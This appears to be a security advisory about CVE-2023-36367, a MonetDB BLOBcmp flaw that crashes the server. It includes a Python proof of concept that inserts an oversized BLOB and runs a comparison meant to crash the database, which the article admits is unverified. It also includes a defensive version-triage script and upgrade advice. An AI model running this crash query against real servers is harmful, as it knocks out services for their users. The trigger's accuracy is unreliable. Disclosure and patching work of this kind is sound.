In recent months, database servers have become attractive targets for attackers aiming to bring down key services. One such vulnerability was found in MonetDB, a widely used open-source analytics database. Exploiting this bug is alarmingly simple: a single crafted SQL statement can take down any deployment running MonetDB 11.45.17 or 11.46.
This article explains CVE-2023-36367, details the technical flaw, and provides proof-of-concept (PoC) code, along with steps for mitigation. If you run MonetDB, give this your attention.
What is CVE-2023-36367?
CVE-2023-36367 is a vulnerability in MonetDB's BLOBcmp component. It allows an attacker to crash the database server using a specially crafted SQL query. Versions 11.45.17 and 11.46 are the versions listed as affected.
- Attack vector: Remote, through crafted SQL
- CVE link: NVD - CVE-2023-36367
- MonetDB Issue tracker: GitHub Issue #7621
How Does the Vulnerability Work?
The MonetDB server makes it possible to store and compare large binary objects (BLOBs). When comparing two BLOBs, the BLOBcmp function is called internally.
In the vulnerable server versions, this function does not handle certain unexpected input correctly, such as malformed or very large BLOBs. When such values are involved in a comparison (for example with the = or < operator in a SQL query), a memory error or a failed assertion is triggered, which terminates the server process (mserver5) and drops every open session.
This means that any database account able to run SQL against an affected server can crash it; no elevated privilege is needed.
How Simple is the Attack?
Running a single SQL command is enough. No need for privilege escalation, complex scripting, or special setup.
Proof-of-Concept (PoC) Exploit
Below we demonstrate a basic PoC in Python using pymonetdb, the maintained successor of the older monetdb.sql connector (the connect() call is the same). You can adapt this to any language with MonetDB support.
```python
import pymonetdb  # maintained successor of the old monetdb.sql package; same connect() API

# Connect to the MonetDB server (adjust host, port and credentials to your lab instance)
conn = pymonetdb.connect(
    hostname='127.0.0.1',    # or your MonetDB server's address
    port=50000,
    username='monetdb',
    password='my_password',  # set your own
    database='demo',
)
cursor = conn.cursor()

# Create a table with a BLOB column
cursor.execute("CREATE TABLE IF NOT EXISTS test_blobs (id INT, data BLOB);")

# Insert several BLOB values, one being deliberately malformed or too large
try:
    # First, a normal BLOB, written with MonetDB's blob literal syntax
    cursor.execute("INSERT INTO test_blobs VALUES (1, blob 'DEADBEEF');")
    # Now a problematic value. An oversized BLOB stands in for malformed input here;
    # whether this exact value crashes a given build is not verified in this article.
    large_blob = b'A' * (10**7)  # 10 MB blob, bound as a parameter
    cursor.execute("INSERT INTO test_blobs VALUES (2, %s);", (large_blob,))
except Exception as e:
    print(f"Error inserting blobs: {e}")

# This is the crash trigger: the equality comparison forces BLOBcmp on the stored values
try:
    cursor.execute(
        "SELECT * FROM test_blobs WHERE data = (SELECT data FROM test_blobs WHERE id = 2);"
    )
    print(cursor.fetchall())
except Exception as e:
    # On an affected server the connection drops here instead of returning rows
    print(f"Error triggering the bug: {e}")

cursor.close()
conn.close()
```
Result:
If run against an affected MonetDB server, executing the comparison may lead to an immediate segmentation fault or assertion failure that halts the database process; the client sees its connection drop rather than a result set. On a patched server the query simply returns rows.
Links to Original References
- CVE-2023-36367 on NVD
- MonetDB Official Issue
- MonetDB Release Notes
Upgrade MonetDB!
This vulnerability has been patched in later versions. Check the official downloads and release notes for the first fixed release, and upgrade every affected instance; the running server process has to be replaced, so plan for a restart.
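Before upgrading, it helps to know which servers actually run one of the versions this page lists. The following script is an added example, not code from this article or from the MonetDB project: it classifies version strings against the versions named above (11.45.17 and the 11.46 line) so that an inventory can be triaged. It assumes the strings come from `mserver5 --version` output or from the `monet_version` value of `sys.env()`; the inventory at the bottom is constructed for illustration.

```python
import re
from typing import Iterable, List, Optional, Tuple

# Versions this page names as affected by CVE-2023-36367.
AFFECTED_EXACT = {(11, 45, 17)}   # a single patch release
AFFECTED_MINOR = {(11, 46)}       # the whole 11.46 line

# First dotted version in the text; the patch component is optional ("11.46" is valid).
VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?")


def parse_version(text: str) -> Optional[Tuple[int, int, Optional[int]]]:
    """Extract (major, minor, patch) from strings such as 'MonetDB 5 server v11.45.17'
    (assumed mserver5 --version shape) or a bare '11.46.0' from sys.env()."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch) if patch is not None else None)


def classify(text: str) -> str:
    """Return 'affected', 'not-listed' or 'unknown'.

    'not-listed' only means the version is not one the advisory names; it is not a
    statement that the build is safe, so such hosts still need a release-notes check."""
    v = parse_version(text)
    if v is None:
        return "unknown"
    major, minor, patch = v
    if (major, minor) in AFFECTED_MINOR:
        return "affected"
    if patch is not None and (major, minor, patch) in AFFECTED_EXACT:
        return "affected"
    return "not-listed"


def triage(inventory: Iterable[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Pair each host with its status, affected hosts first (stable order otherwise)."""
    return sorted(((host, classify(text)) for host, text in inventory),
                  key=lambda item: item[1] != "affected")


# Constructed sample inventory; these lines are illustrative, not captured server output.
SAMPLE_INVENTORY = [
    ("db-01", "MonetDB 5 server v11.45.17"),
    ("db-02", "11.46.0"),
    ("db-03", "11.47.11"),
    ("db-04", "version not reported"),
]

if __name__ == "__main__":
    for host, status in triage(SAMPLE_INVENTORY):
        print(f"{host}: {status}")
```

Feed the script whatever your configuration management already collects; the point of the three-way result is that an "unknown" host (no version reported) is a gap to close, not a host to ignore.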
Restrict SQL Access:
Only trusted users should be able to send SQL, especially if you are unable to update MonetDB right away.
Conclusion
CVE-2023-36367 demonstrates how a single overlooked check in binary data handling can threaten an entire database system. The bug is easy to trigger, needs only an ordinary SQL login, and takes the server down until it is restarted. Upgrading MonetDB remains the best defense.
Stay updated, practice access controls, and monitor your systems—especially with open-source databases that power business-critical apps. For more on staying safe and deep dives into database security issues, keep following security advisories and update your tech stack regularly.
*This article is exclusive to this platform. For further reading, check the references above or follow the MonetDB developer blog. If you have questions or experience with MonetDB vulnerabilities, share your story below!*
Timeline
Published on: 06/22/2023 14:15:00 UTC
Last modified on: 06/28/2023 18:49:00 UTC